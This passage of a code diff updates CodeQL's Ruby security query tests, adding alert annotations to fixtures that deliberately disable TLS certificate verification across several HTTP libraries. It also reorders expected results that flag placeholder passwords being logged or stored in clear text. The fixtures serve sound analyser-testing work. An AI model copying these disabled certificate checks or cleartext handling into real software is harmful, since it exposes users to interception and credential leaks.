@@ -1,19 +1,19 @@ require "httparty" # BAD -HTTParty.get("http://example.com/", verify: false) +HTTParty.get("http://example.com/", verify: false) # $ Alert # BAD -HTTParty.get("http://example.com/", verify_peer: false) +HTTParty.get("http://example.com/", verify_peer: false) # $ Alert # BAD -HTTParty.get("http://example.com/", { verify_peer: false }) +HTTParty.get("http://example.com/", { verify_peer: false }) # $ Alert # BAD -HTTParty.post("http://example.com/", body: "some_data", verify: false) +HTTParty.post("http://example.com/", body: "some_data", verify: false) # $ Alert # BAD -HTTParty.post("http://example.com/", { body: "some_data", verify: false }) +HTTParty.post("http://example.com/", { body: "some_data", verify: false }) # $ Alert # GOOD HTTParty.get("http://example.com/") diff --git a/ruby/ql/test/query-tests/security/cwe-295/NetHttp.rb b/ruby/ql/test/query-tests/security/cwe-295/NetHttp.rb index 9269eeae5316..7915e8b80d6f 100644 --- a/ruby/ql/test/query-tests/security/cwe-295/NetHttp.rb +++ b/ruby/ql/test/query-tests/security/cwe-295/NetHttp.rb @@ -6,5 +6,5 @@ http.use_ssl = true http.verify_mode = OpenSSL::SSL::VERIFY_NONE request = Net::HTTP::Get.new uri.request_uri -response = http.request request +response = http.request request # $ Alert puts response.body diff --git a/ruby/ql/test/query-tests/security/cwe-295/OpenURI.rb b/ruby/ql/test/query-tests/security/cwe-295/OpenURI.rb index a825791c8233..377f864b5b7b 100644 --- a/ruby/ql/test/query-tests/security/cwe-295/OpenURI.rb +++ b/ruby/ql/test/query-tests/security/cwe-295/OpenURI.rb 
@@ -1,24 +1,24 @@ require "open-uri" # BAD -Kernel.open("https://example.com", ssl_verify_mode: OpenSSL::SSL::VERIFY_NONE) +Kernel.open("https://example.com", ssl_verify_mode: OpenSSL::SSL::VERIFY_NONE) # $ Alert # BAD -Kernel.open("https://example.com", { ssl_verify_mode: OpenSSL::SSL::VERIFY_NONE }) +Kernel.open("https://example.com", { ssl_verify_mode: OpenSSL::SSL::VERIFY_NONE }) # $ Alert # BAD options = { ssl_verify_mode: OpenSSL::SSL::VERIFY_NONE } -Kernel.open("https://example.com", options) +Kernel.open("https://example.com", options) # $ Alert # BAD -URI.parse("https://example.com").open(ssl_verify_mode: OpenSSL::SSL::VERIFY_NONE) +URI.parse("https://example.com").open(ssl_verify_mode: OpenSSL::SSL::VERIFY_NONE) # $ Alert # BAD -URI.parse("https://example.com").open({ ssl_verify_mode: OpenSSL::SSL::VERIFY_NONE }) +URI.parse("https://example.com").open({ ssl_verify_mode: OpenSSL::SSL::VERIFY_NONE }) # $ Alert # BAD options = { ssl_verify_mode: OpenSSL::SSL::VERIFY_NONE } -URI.parse("https://example.com").open(options) +URI.parse("https://example.com").open(options) # $ Alert # GOOD Kernel.open("https://example.com") diff --git a/ruby/ql/test/query-tests/security/cwe-295/RequestWithoutValidation.qlref b/ruby/ql/test/query-tests/security/cwe-295/RequestWithoutValidation.qlref index e2caf232ddbc..22b77bdb4b0f 100644 --- a/ruby/ql/test/query-tests/security/cwe-295/RequestWithoutValidation.qlref +++ b/ruby/ql/test/query-tests/security/cwe-295/RequestWithoutValidation.qlref @@ -1 +1,2 @@ -queries/security/cwe-295/RequestWithoutValidation.ql \ No newline at end of file +query: queries/security/cwe-295/RequestWithoutValidation.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/ruby/ql/test/query-tests/security/cwe-295/RestClient.rb b/ruby/ql/test/query-tests/security/cwe-295/RestClient.rb index a180ac0d74c0..911607288237 100644 --- a/ruby/ql/test/query-tests/security/cwe-295/RestClient.rb 
+++ b/ruby/ql/test/query-tests/security/cwe-295/RestClient.rb @@ -2,21 +2,21 @@ # BAD resource = RestClient::Resource.new("https://example.com", verify_ssl: OpenSSL::SSL::VERIFY_NONE) -response = resource.get +response = resource.get # $ Alert # BAD resource = RestClient::Resource.new("https://example.com", { verify_ssl: OpenSSL::SSL::VERIFY_NONE }) -response = resource.get +response = resource.get # $ Alert # BAD options = { verify_ssl: OpenSSL::SSL::VERIFY_NONE } resource = RestClient::Resource.new("https://example.com", options) -response = resource.get +response = resource.get # $ Alert # BAD value = OpenSSL::SSL::VERIFY_NONE resource = RestClient::Resource.new("https://example.com", verify_ssl: value) -response = resource.get +response = resource.get # $ Alert # GOOD RestClient.get("https://example.com") diff --git a/ruby/ql/test/query-tests/security/cwe-295/Typhoeus.rb b/ruby/ql/test/query-tests/security/cwe-295/Typhoeus.rb index aed601cf8889..82f91da4d920 100644 --- a/ruby/ql/test/query-tests/security/cwe-295/Typhoeus.rb +++ b/ruby/ql/test/query-tests/security/cwe-295/Typhoeus.rb @@ -1,11 +1,11 @@ require "typhoeus" # BAD -Typhoeus.get("https://www.example.com", ssl_verifypeer: false) +Typhoeus.get("https://www.example.com", ssl_verifypeer: false) # $ Alert # BAD post_options = { body: "some data", ssl_verifypeer: false } -Typhoeus.post("https://www.example.com", post_options) +Typhoeus.post("https://www.example.com", post_options) # $ Alert # GOOD Typhoeus.get("https://www.example.com") \ No newline at end of file diff --git a/ruby/ql/test/query-tests/security/cwe-312/CleartextLogging.expected b/ruby/ql/test/query-tests/security/cwe-312/CleartextLogging.expected index 7c2d4d259e33..ae87773dd0e8 100644 --- a/ruby/ql/test/query-tests/security/cwe-312/CleartextLogging.expected +++ b/ruby/ql/test/query-tests/security/cwe-312/CleartextLogging.expected 
@@ -1,3 +1,26 @@ +#select +| logging.rb:6:20:6:27 | password | logging.rb:3:12:3:45 | "043697b96909e03ca907599d6420555f" : String | logging.rb:6:20:6:27 | password | This logs sensitive data returned by $@ as clear text. | logging.rb:3:12:3:45 | "043697b96909e03ca907599d6420555f" | an assignment to password | +| logging.rb:8:21:8:28 | password | logging.rb:3:12:3:45 | "043697b96909e03ca907599d6420555f" : String | logging.rb:8:21:8:28 | password | This logs sensitive data returned by $@ as clear text. | logging.rb:3:12:3:45 | "043697b96909e03ca907599d6420555f" | an assignment to password | +| logging.rb:10:21:10:28 | password | logging.rb:3:12:3:45 | "043697b96909e03ca907599d6420555f" : String | logging.rb:10:21:10:28 | password | This logs sensitive data returned by $@ as clear text. | logging.rb:3:12:3:45 | "043697b96909e03ca907599d6420555f" | an assignment to password | +| logging.rb:12:21:12:28 | password | logging.rb:3:12:3:45 | "043697b96909e03ca907599d6420555f" : String | logging.rb:12:21:12:28 | password | This logs sensitive data returned by $@ as clear text. | logging.rb:3:12:3:45 | "043697b96909e03ca907599d6420555f" | an assignment to password | +| logging.rb:14:23:14:30 | password | logging.rb:3:12:3:45 | "043697b96909e03ca907599d6420555f" : String | logging.rb:14:23:14:30 | password | This logs sensitive data returned by $@ as clear text. | logging.rb:3:12:3:45 | "043697b96909e03ca907599d6420555f" | an assignment to password | +| logging.rb:16:20:16:27 | password | logging.rb:3:12:3:45 | "043697b96909e03ca907599d6420555f" : String | logging.rb:16:20:16:27 | password | This logs sensitive data returned by $@ as clear text. | logging.rb:3:12:3:45 | "043697b96909e03ca907599d6420555f" | an assignment to password | +| logging.rb:19:33:19:40 | password | logging.rb:3:12:3:45 | "043697b96909e03ca907599d6420555f" : String | logging.rb:19:33:19:40 | password | This logs sensitive data returned by $@ as clear text. 
| logging.rb:3:12:3:45 | "043697b96909e03ca907599d6420555f" | an assignment to password | +| logging.rb:21:44:21:51 | password | logging.rb:3:12:3:45 | "043697b96909e03ca907599d6420555f" : String | logging.rb:21:44:21:51 | password | This logs sensitive data returned by $@ as clear text. | logging.rb:3:12:3:45 | "043697b96909e03ca907599d6420555f" | an assignment to password | +| logging.rb:23:33:23:40 | password | logging.rb:3:12:3:45 | "043697b96909e03ca907599d6420555f" : String | logging.rb:23:33:23:40 | password | This logs sensitive data returned by $@ as clear text. | logging.rb:3:12:3:45 | "043697b96909e03ca907599d6420555f" | an assignment to password | +| logging.rb:26:18:26:34 | "pw: #{...}" | logging.rb:3:12:3:45 | "043697b96909e03ca907599d6420555f" : String | logging.rb:26:18:26:34 | "pw: #{...}" | This logs sensitive data returned by $@ as clear text. | logging.rb:3:12:3:45 | "043697b96909e03ca907599d6420555f" | an assignment to password | +| logging.rb:28:26:28:33 | password | logging.rb:3:12:3:45 | "043697b96909e03ca907599d6420555f" : String | logging.rb:28:26:28:33 | password | This logs sensitive data returned by $@ as clear text. | logging.rb:3:12:3:45 | "043697b96909e03ca907599d6420555f" | an assignment to password | +| logging.rb:38:20:38:34 | ...[...] | logging.rb:30:20:30:53 | "aec5058e61f7f122998b1a30ee2c66b6" : String | logging.rb:38:20:38:34 | ...[...] | This logs sensitive data returned by $@ as clear text. | logging.rb:30:20:30:53 | "aec5058e61f7f122998b1a30ee2c66b6" | a write to password | +| logging.rb:40:20:40:34 | ...[...] | logging.rb:34:19:34:52 | "beeda625d7306b45784d91ea0336e201" : String | logging.rb:40:20:40:34 | ...[...] | This logs sensitive data returned by $@ as clear text. | logging.rb:34:19:34:52 | "beeda625d7306b45784d91ea0336e201" | a write to password | +| logging.rb:42:20:42:34 | ...[...] | logging.rb:34:19:34:52 | "beeda625d7306b45784d91ea0336e201" : String | logging.rb:42:20:42:34 | ...[...] 
| This logs sensitive data returned by $@ as clear text. | logging.rb:34:19:34:52 | "beeda625d7306b45784d91ea0336e201" | a write to password | +| logging.rb:74:20:74:50 | password_masked_ineffective_sub | logging.rb:64:35:64:68 | "ca497451f5e883662fb1a37bc9ec7838" : String | logging.rb:74:20:74:50 | password_masked_ineffective_sub | This logs sensitive data returned by $@ as clear text. | logging.rb:64:35:64:68 | "ca497451f5e883662fb1a37bc9ec7838" | an assignment to password_masked_ineffective_sub | +| logging.rb:74:20:74:50 | password_masked_ineffective_sub | logging.rb:68:35:68:88 | call to sub | logging.rb:74:20:74:50 | password_masked_ineffective_sub | This logs sensitive data returned by $@ as clear text. | logging.rb:68:35:68:88 | call to sub | an assignment to password_masked_ineffective_sub | +| logging.rb:76:20:76:51 | password_masked_ineffective_gsub | logging.rb:66:36:66:69 | "a7e3747b19930d4f4b8181047194832f" : String | logging.rb:76:20:76:51 | password_masked_ineffective_gsub | This logs sensitive data returned by $@ as clear text. | logging.rb:66:36:66:69 | "a7e3747b19930d4f4b8181047194832f" | an assignment to password_masked_ineffective_gsub | +| logging.rb:76:20:76:51 | password_masked_ineffective_gsub | logging.rb:70:36:70:86 | call to gsub | logging.rb:76:20:76:51 | password_masked_ineffective_gsub | This logs sensitive data returned by $@ as clear text. | logging.rb:70:36:70:86 | call to gsub | an assignment to password_masked_ineffective_gsub | +| logging.rb:78:20:78:53 | password_masked_ineffective_sub_ex | logging.rb:65:38:65:71 | "ca497451f5e883662fb1a37bc9ec7838" : String | logging.rb:78:20:78:53 | password_masked_ineffective_sub_ex | This logs sensitive data returned by $@ as clear text. 
| logging.rb:65:38:65:71 | "ca497451f5e883662fb1a37bc9ec7838" | an assignment to password_masked_ineffective_sub_ex | +| logging.rb:80:20:80:54 | password_masked_ineffective_gsub_ex | logging.rb:67:39:67:72 | "a7e3747b19930d4f4b8181047194832f" : String | logging.rb:80:20:80:54 | password_masked_ineffective_gsub_ex | This logs sensitive data returned by $@ as clear text. | logging.rb:67:39:67:72 | "a7e3747b19930d4f4b8181047194832f" | an assignment to password_masked_ineffective_gsub_ex | +| logging.rb:84:15:84:22 | password | logging.rb:84:15:84:22 | password | logging.rb:84:15:84:22 | password | This logs sensitive data returned by $@ as clear text. | logging.rb:84:15:84:22 | password | a parameter password | +| logging.rb:84:15:84:22 | password | logging.rb:87:16:87:49 | "65f2950df2f0e2c38d7ba2ccca767291" : String | logging.rb:84:15:84:22 | password | This logs sensitive data returned by $@ as clear text. | logging.rb:87:16:87:49 | "65f2950df2f0e2c38d7ba2ccca767291" | an assignment to password_arg | edges | logging.rb:3:1:3:8 | password : String | logging.rb:6:20:6:27 | password | provenance | | | logging.rb:3:1:3:8 | password : String | logging.rb:8:21:8:28 | password | provenance | | 
@@ -89,26 +112,3 @@ nodes | logging.rb:87:16:87:49 | "65f2950df2f0e2c38d7ba2ccca767291" : String | semmle.label | "65f2950df2f0e2c38d7ba2ccca767291" : String | | logging.rb:88:5:88:16 | password_arg : String | semmle.label | password_arg : String | subpaths -#select -| logging.rb:6:20:6:27 | password | logging.rb:3:12:3:45 | "043697b96909e03ca907599d6420555f" : String | logging.rb:6:20:6:27 | password | This logs sensitive data returned by $@ as clear text. | logging.rb:3:12:3:45 | "043697b96909e03ca907599d6420555f" | an assignment to password | -| logging.rb:8:21:8:28 | password | logging.rb:3:12:3:45 | "043697b96909e03ca907599d6420555f" : String | logging.rb:8:21:8:28 | password | This logs sensitive data returned by $@ as clear text. | logging.rb:3:12:3:45 | "043697b96909e03ca907599d6420555f" | an assignment to password | -| logging.rb:10:21:10:28 | password | logging.rb:3:12:3:45 | "043697b96909e03ca907599d6420555f" : String | logging.rb:10:21:10:28 | password | This logs sensitive data returned by $@ as clear text. | logging.rb:3:12:3:45 | "043697b96909e03ca907599d6420555f" | an assignment to password | -| logging.rb:12:21:12:28 | password | logging.rb:3:12:3:45 | "043697b96909e03ca907599d6420555f" : String | logging.rb:12:21:12:28 | password | This logs sensitive data returned by $@ as clear text. | logging.rb:3:12:3:45 | "043697b96909e03ca907599d6420555f" | an assignment to password | -| logging.rb:14:23:14:30 | password | logging.rb:3:12:3:45 | "043697b96909e03ca907599d6420555f" : String | logging.rb:14:23:14:30 | password | This logs sensitive data returned by $@ as clear text. | logging.rb:3:12:3:45 | "043697b96909e03ca907599d6420555f" | an assignment to password | -| logging.rb:16:20:16:27 | password | logging.rb:3:12:3:45 | "043697b96909e03ca907599d6420555f" : String | logging.rb:16:20:16:27 | password | This logs sensitive data returned by $@ as clear text. 
| logging.rb:3:12:3:45 | "043697b96909e03ca907599d6420555f" | an assignment to password | -| logging.rb:19:33:19:40 | password | logging.rb:3:12:3:45 | "043697b96909e03ca907599d6420555f" : String | logging.rb:19:33:19:40 | password | This logs sensitive data returned by $@ as clear text. | logging.rb:3:12:3:45 | "043697b96909e03ca907599d6420555f" | an assignment to password | -| logging.rb:21:44:21:51 | password | logging.rb:3:12:3:45 | "043697b96909e03ca907599d6420555f" : String | logging.rb:21:44:21:51 | password | This logs sensitive data returned by $@ as clear text. | logging.rb:3:12:3:45 | "043697b96909e03ca907599d6420555f" | an assignment to password | -| logging.rb:23:33:23:40 | password | logging.rb:3:12:3:45 | "043697b96909e03ca907599d6420555f" : String | logging.rb:23:33:23:40 | password | This logs sensitive data returned by $@ as clear text. | logging.rb:3:12:3:45 | "043697b96909e03ca907599d6420555f" | an assignment to password | -| logging.rb:26:18:26:34 | "pw: #{...}" | logging.rb:3:12:3:45 | "043697b96909e03ca907599d6420555f" : String | logging.rb:26:18:26:34 | "pw: #{...}" | This logs sensitive data returned by $@ as clear text. | logging.rb:3:12:3:45 | "043697b96909e03ca907599d6420555f" | an assignment to password | -| logging.rb:28:26:28:33 | password | logging.rb:3:12:3:45 | "043697b96909e03ca907599d6420555f" : String | logging.rb:28:26:28:33 | password | This logs sensitive data returned by $@ as clear text. | logging.rb:3:12:3:45 | "043697b96909e03ca907599d6420555f" | an assignment to password | -| logging.rb:38:20:38:34 | ...[...] | logging.rb:30:20:30:53 | "aec5058e61f7f122998b1a30ee2c66b6" : String | logging.rb:38:20:38:34 | ...[...] | This logs sensitive data returned by $@ as clear text. | logging.rb:30:20:30:53 | "aec5058e61f7f122998b1a30ee2c66b6" | a write to password | -| logging.rb:40:20:40:34 | ...[...] | logging.rb:34:19:34:52 | "beeda625d7306b45784d91ea0336e201" : String | logging.rb:40:20:40:34 | ...[...] 
| This logs sensitive data returned by $@ as clear text. | logging.rb:34:19:34:52 | "beeda625d7306b45784d91ea0336e201" | a write to password | -| logging.rb:42:20:42:34 | ...[...] | logging.rb:34:19:34:52 | "beeda625d7306b45784d91ea0336e201" : String | logging.rb:42:20:42:34 | ...[...] | This logs sensitive data returned by $@ as clear text. | logging.rb:34:19:34:52 | "beeda625d7306b45784d91ea0336e201" | a write to password | -| logging.rb:74:20:74:50 | password_masked_ineffective_sub | logging.rb:64:35:64:68 | "ca497451f5e883662fb1a37bc9ec7838" : String | logging.rb:74:20:74:50 | password_masked_ineffective_sub | This logs sensitive data returned by $@ as clear text. | logging.rb:64:35:64:68 | "ca497451f5e883662fb1a37bc9ec7838" | an assignment to password_masked_ineffective_sub | -| logging.rb:74:20:74:50 | password_masked_ineffective_sub | logging.rb:68:35:68:88 | call to sub | logging.rb:74:20:74:50 | password_masked_ineffective_sub | This logs sensitive data returned by $@ as clear text. | logging.rb:68:35:68:88 | call to sub | an assignment to password_masked_ineffective_sub | -| logging.rb:76:20:76:51 | password_masked_ineffective_gsub | logging.rb:66:36:66:69 | "a7e3747b19930d4f4b8181047194832f" : String | logging.rb:76:20:76:51 | password_masked_ineffective_gsub | This logs sensitive data returned by $@ as clear text. | logging.rb:66:36:66:69 | "a7e3747b19930d4f4b8181047194832f" | an assignment to password_masked_ineffective_gsub | -| logging.rb:76:20:76:51 | password_masked_ineffective_gsub | logging.rb:70:36:70:86 | call to gsub | logging.rb:76:20:76:51 | password_masked_ineffective_gsub | This logs sensitive data returned by $@ as clear text. 
| logging.rb:70:36:70:86 | call to gsub | an assignment to password_masked_ineffective_gsub | -| logging.rb:78:20:78:53 | password_masked_ineffective_sub_ex | logging.rb:65:38:65:71 | "ca497451f5e883662fb1a37bc9ec7838" : String | logging.rb:78:20:78:53 | password_masked_ineffective_sub_ex | This logs sensitive data returned by $@ as clear text. | logging.rb:65:38:65:71 | "ca497451f5e883662fb1a37bc9ec7838" | an assignment to password_masked_ineffective_sub_ex | -| logging.rb:80:20:80:54 | password_masked_ineffective_gsub_ex | logging.rb:67:39:67:72 | "a7e3747b19930d4f4b8181047194832f" : String | logging.rb:80:20:80:54 | password_masked_ineffective_gsub_ex | This logs sensitive data returned by $@ as clear text. | logging.rb:67:39:67:72 | "a7e3747b19930d4f4b8181047194832f" | an assignment to password_masked_ineffective_gsub_ex | -| logging.rb:84:15:84:22 | password | logging.rb:84:15:84:22 | password | logging.rb:84:15:84:22 | password | This logs sensitive data returned by $@ as clear text. | logging.rb:84:15:84:22 | password | a parameter password | -| logging.rb:84:15:84:22 | password | logging.rb:87:16:87:49 | "65f2950df2f0e2c38d7ba2ccca767291" : String | logging.rb:84:15:84:22 | password | This logs sensitive data returned by $@ as clear text. | logging.rb:87:16:87:49 | "65f2950df2f0e2c38d7ba2ccca767291" | an assignment to password_arg | diff --git a/ruby/ql/test/query-tests/security/cwe-312/CleartextLogging.qlref b/ruby/ql/test/query-tests/security/cwe-312/CleartextLogging.qlref index 4a8ed809dfc6..eb4d8d767b30 100644 --- a/ruby/ql/test/query-tests/security/cwe-312/CleartextLogging.qlref +++ b/ruby/ql/test/query-tests/security/cwe-312/CleartextLogging.qlref @@ -1 +1,2 @@ -queries/security/cwe-312/CleartextLogging.ql \ No newline at end of file +query: queries/security/cwe-312/CleartextLogging.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql 
diff --git a/ruby/ql/test/query-tests/security/cwe-312/CleartextStorage.expected b/ruby/ql/test/query-tests/security/cwe-312/CleartextStorage.expected index 2a1c5c564652..76b6520fbdb1 100644 --- a/ruby/ql/test/query-tests/security/cwe-312/CleartextStorage.expected +++ b/ruby/ql/test/query-tests/security/cwe-312/CleartextStorage.expected 
@@ -1,3 +1,32 @@ +#select +| app/controllers/users_controller.rb:5:39:5:50 | new_password | app/controllers/users_controller.rb:3:20:3:53 | "043697b96909e03ca907599d6420555f" : String | app/controllers/users_controller.rb:5:39:5:50 | new_password | This stores sensitive data returned by $@ as clear text. | app/controllers/users_controller.rb:3:20:3:53 | "043697b96909e03ca907599d6420555f" | an assignment to new_password | +| app/controllers/users_controller.rb:7:41:7:52 | new_password | app/controllers/users_controller.rb:3:20:3:53 | "043697b96909e03ca907599d6420555f" : String | app/controllers/users_controller.rb:7:41:7:52 | new_password | This stores sensitive data returned by $@ as clear text. | app/controllers/users_controller.rb:3:20:3:53 | "043697b96909e03ca907599d6420555f" | an assignment to new_password | +| app/controllers/users_controller.rb:7:41:7:52 | new_password | app/controllers/users_controller.rb:7:41:7:52 | new_password | app/controllers/users_controller.rb:7:41:7:52 | new_password | This stores sensitive data returned by $@ as clear text. | app/controllers/users_controller.rb:7:41:7:52 | new_password | a write to password | +| app/controllers/users_controller.rb:13:42:13:53 | new_password | app/controllers/users_controller.rb:11:20:11:53 | "083c9e1da4cc0c2f5480bb4dbe6ff141" : String | app/controllers/users_controller.rb:13:42:13:53 | new_password | This stores sensitive data returned by $@ as clear text. | app/controllers/users_controller.rb:11:20:11:53 | "083c9e1da4cc0c2f5480bb4dbe6ff141" | an assignment to new_password | +| app/controllers/users_controller.rb:15:49:15:60 | new_password | app/controllers/users_controller.rb:11:20:11:53 | "083c9e1da4cc0c2f5480bb4dbe6ff141" : String | app/controllers/users_controller.rb:15:49:15:60 | new_password | This stores sensitive data returned by $@ as clear text. 
| app/controllers/users_controller.rb:11:20:11:53 | "083c9e1da4cc0c2f5480bb4dbe6ff141" | an assignment to new_password | +| app/controllers/users_controller.rb:15:49:15:60 | new_password | app/controllers/users_controller.rb:15:49:15:60 | new_password | app/controllers/users_controller.rb:15:49:15:60 | new_password | This stores sensitive data returned by $@ as clear text. | app/controllers/users_controller.rb:15:49:15:60 | new_password | a write to password | +| app/controllers/users_controller.rb:15:87:15:98 | new_password | app/controllers/users_controller.rb:11:20:11:53 | "083c9e1da4cc0c2f5480bb4dbe6ff141" : String | app/controllers/users_controller.rb:15:87:15:98 | new_password | This stores sensitive data returned by $@ as clear text. | app/controllers/users_controller.rb:11:20:11:53 | "083c9e1da4cc0c2f5480bb4dbe6ff141" | an assignment to new_password | +| app/controllers/users_controller.rb:15:87:15:98 | new_password | app/controllers/users_controller.rb:15:49:15:60 | new_password | app/controllers/users_controller.rb:15:87:15:98 | new_password | This stores sensitive data returned by $@ as clear text. | app/controllers/users_controller.rb:15:49:15:60 | new_password | a write to password | +| app/controllers/users_controller.rb:15:87:15:98 | new_password | app/controllers/users_controller.rb:15:87:15:98 | new_password | app/controllers/users_controller.rb:15:87:15:98 | new_password | This stores sensitive data returned by $@ as clear text. | app/controllers/users_controller.rb:15:87:15:98 | new_password | a write to password | +| app/controllers/users_controller.rb:21:45:21:56 | new_password | app/controllers/users_controller.rb:19:20:19:53 | "504d224a806cf8073cd14ef08242d422" : String | app/controllers/users_controller.rb:21:45:21:56 | new_password | This stores sensitive data returned by $@ as clear text. 
| app/controllers/users_controller.rb:19:20:19:53 | "504d224a806cf8073cd14ef08242d422" | an assignment to new_password | +| app/controllers/users_controller.rb:21:45:21:56 | new_password | app/controllers/users_controller.rb:21:45:21:56 | new_password | app/controllers/users_controller.rb:21:45:21:56 | new_password | This stores sensitive data returned by $@ as clear text. | app/controllers/users_controller.rb:21:45:21:56 | new_password | a write to password | +| app/controllers/users_controller.rb:21:83:21:94 | new_password | app/controllers/users_controller.rb:19:20:19:53 | "504d224a806cf8073cd14ef08242d422" : String | app/controllers/users_controller.rb:21:83:21:94 | new_password | This stores sensitive data returned by $@ as clear text. | app/controllers/users_controller.rb:19:20:19:53 | "504d224a806cf8073cd14ef08242d422" | an assignment to new_password | +| app/controllers/users_controller.rb:21:83:21:94 | new_password | app/controllers/users_controller.rb:21:45:21:56 | new_password | app/controllers/users_controller.rb:21:83:21:94 | new_password | This stores sensitive data returned by $@ as clear text. | app/controllers/users_controller.rb:21:45:21:56 | new_password | a write to password | +| app/controllers/users_controller.rb:21:83:21:94 | new_password | app/controllers/users_controller.rb:21:83:21:94 | new_password | app/controllers/users_controller.rb:21:83:21:94 | new_password | This stores sensitive data returned by $@ as clear text. | app/controllers/users_controller.rb:21:83:21:94 | new_password | a write to password | +| app/controllers/users_controller.rb:28:27:28:38 | new_password | app/controllers/users_controller.rb:26:20:26:53 | "7d6ae08394c3f284506dca70f05995f6" : String | app/controllers/users_controller.rb:28:27:28:38 | new_password | This stores sensitive data returned by $@ as clear text. 
| app/controllers/users_controller.rb:26:20:26:53 | "7d6ae08394c3f284506dca70f05995f6" | an assignment to new_password | +| app/controllers/users_controller.rb:30:28:30:39 | new_password | app/controllers/users_controller.rb:26:20:26:53 | "7d6ae08394c3f284506dca70f05995f6" : String | app/controllers/users_controller.rb:30:28:30:39 | new_password | This stores sensitive data returned by $@ as clear text. | app/controllers/users_controller.rb:26:20:26:53 | "7d6ae08394c3f284506dca70f05995f6" | an assignment to new_password | +| app/controllers/users_controller.rb:30:28:30:39 | new_password | app/controllers/users_controller.rb:30:28:30:39 | new_password | app/controllers/users_controller.rb:30:28:30:39 | new_password | This stores sensitive data returned by $@ as clear text. | app/controllers/users_controller.rb:30:28:30:39 | new_password | a write to password | +| app/controllers/users_controller.rb:37:39:37:50 | new_password | app/controllers/users_controller.rb:35:20:35:53 | "ff295f8648a406c37fbe378377320e4c" : String | app/controllers/users_controller.rb:37:39:37:50 | new_password | This stores sensitive data returned by $@ as clear text. | app/controllers/users_controller.rb:35:20:35:53 | "ff295f8648a406c37fbe378377320e4c" | an assignment to new_password | +| app/controllers/users_controller.rb:44:21:44:32 | new_password | app/controllers/users_controller.rb:42:20:42:53 | "78ffbec583b546bd073efd898f833184" : String | app/controllers/users_controller.rb:44:21:44:32 | new_password | This stores sensitive data returned by $@ as clear text. | app/controllers/users_controller.rb:42:20:42:53 | "78ffbec583b546bd073efd898f833184" | an assignment to new_password | +| app/controllers/users_controller.rb:61:25:61:53 | "password: #{...}\\n" | app/controllers/users_controller.rb:58:20:58:53 | "0157af7c38cbdd24f1616de4e5321861" : String | app/controllers/users_controller.rb:61:25:61:53 | "password: #{...}\\n" | This stores sensitive data returned by $@ as clear text. 
| app/controllers/users_controller.rb:58:20:58:53 | "0157af7c38cbdd24f1616de4e5321861" | an assignment to new_password | +| app/controllers/users_controller.rb:64:35:64:61 | "password: #{...}" | app/controllers/users_controller.rb:58:20:58:53 | "0157af7c38cbdd24f1616de4e5321861" : String | app/controllers/users_controller.rb:64:35:64:61 | "password: #{...}" | This stores sensitive data returned by $@ as clear text. | app/controllers/users_controller.rb:58:20:58:53 | "0157af7c38cbdd24f1616de4e5321861" | an assignment to new_password | +| app/controllers/users_controller.rb:87:20:87:22 | inf | app/controllers/users_controller.rb:79:19:79:30 | "aaaaaaaaaa" : String | app/controllers/users_controller.rb:87:20:87:22 | inf | This stores sensitive data returned by $@ as clear text. | app/controllers/users_controller.rb:79:19:79:30 | "aaaaaaaaaa" | a write to password | +| app/controllers/users_controller.rb:87:20:87:22 | inf | app/controllers/users_controller.rb:80:29:80:49 | "0000-0000-0000-0000" : String | app/controllers/users_controller.rb:87:20:87:22 | inf | This stores sensitive data returned by $@ as clear text. | app/controllers/users_controller.rb:80:29:80:49 | "0000-0000-0000-0000" | a write to credit_card_number | +| app/controllers/users_controller.rb:87:20:87:22 | inf | app/controllers/users_controller.rb:81:14:81:27 | "000-00-00000" : String | app/controllers/users_controller.rb:87:20:87:22 | inf | This stores sensitive data returned by $@ as clear text. | app/controllers/users_controller.rb:81:14:81:27 | "000-00-00000" | a write to SSN | +| app/controllers/users_controller.rb:87:20:87:22 | inf | app/controllers/users_controller.rb:83:30:83:38 | "bbbbbbb" : String | app/controllers/users_controller.rb:87:20:87:22 | inf | This stores sensitive data returned by $@ as clear text. 
| app/controllers/users_controller.rb:83:30:83:38 | "bbbbbbb" | a write to password | +| app/models/user.rb:5:27:5:38 | new_password | app/models/user.rb:3:20:3:53 | "06c38c6a8a9c11a9d3b209a3193047b4" : String | app/models/user.rb:5:27:5:38 | new_password | This stores sensitive data returned by $@ as clear text. | app/models/user.rb:3:20:3:53 | "06c38c6a8a9c11a9d3b209a3193047b4" | an assignment to new_password | +| app/models/user.rb:11:22:11:33 | new_password | app/models/user.rb:9:20:9:53 | "52652fb5c709fb6b9b5a0194af7c6067" : String | app/models/user.rb:11:22:11:33 | new_password | This stores sensitive data returned by $@ as clear text. | app/models/user.rb:9:20:9:53 | "52652fb5c709fb6b9b5a0194af7c6067" | an assignment to new_password | +| app/models/user.rb:17:21:17:32 | new_password | app/models/user.rb:15:20:15:53 | "f982bf2531c149a8a1444a951b12e830" : String | app/models/user.rb:17:21:17:32 | new_password | This stores sensitive data returned by $@ as clear text. | app/models/user.rb:15:20:15:53 | "f982bf2531c149a8a1444a951b12e830" | an assignment to new_password | edges | app/controllers/users_controller.rb:3:5:3:16 | new_password : String | app/controllers/users_controller.rb:5:39:5:50 | new_password | provenance | | | app/controllers/users_controller.rb:3:5:3:16 | new_password : String | app/controllers/users_controller.rb:7:41:7:52 | new_password | provenance | | 
@@ -120,32 +149,3 @@ nodes | app/models/user.rb:15:20:15:53 | "f982bf2531c149a8a1444a951b12e830" : String | semmle.label | "f982bf2531c149a8a1444a951b12e830" : String | | app/models/user.rb:17:21:17:32 | new_password | semmle.label | new_password | subpaths -#select -| app/controllers/users_controller.rb:5:39:5:50 | new_password | app/controllers/users_controller.rb:3:20:3:53 | "043697b96909e03ca907599d6420555f" : String | app/controllers/users_controller.rb:5:39:5:50 | new_password | This stores sensitive data returned by $@ as clear text. | app/controllers/users_controller.rb:3:20:3:53 | "043697b96909e03ca907599d6420555f" | an assignment to new_password | -| app/controllers/users_controller.rb:7:41:7:52 | new_password | app/controllers/users_controller.rb:3:20:3:53 | "043697b96909e03ca907599d6420555f" : String | app/controllers/users_controller.rb:7:41:7:52 | new_password | This stores sensitive data returned by $@ as clear text. | app/controllers/users_controller.rb:3:20:3:53 | "043697b96909e03ca907599d6420555f" | an assignment to new_password | -| app/controllers/users_controller.rb:7:41:7:52 | new_password | app/controllers/users_controller.rb:7:41:7:52 | new_password | app/controllers/users_controller.rb:7:41:7:52 | new_password | This stores sensitive data returned by $@ as clear text. | app/controllers/users_controller.rb:7:41:7:52 | new_password | a write to password | -| 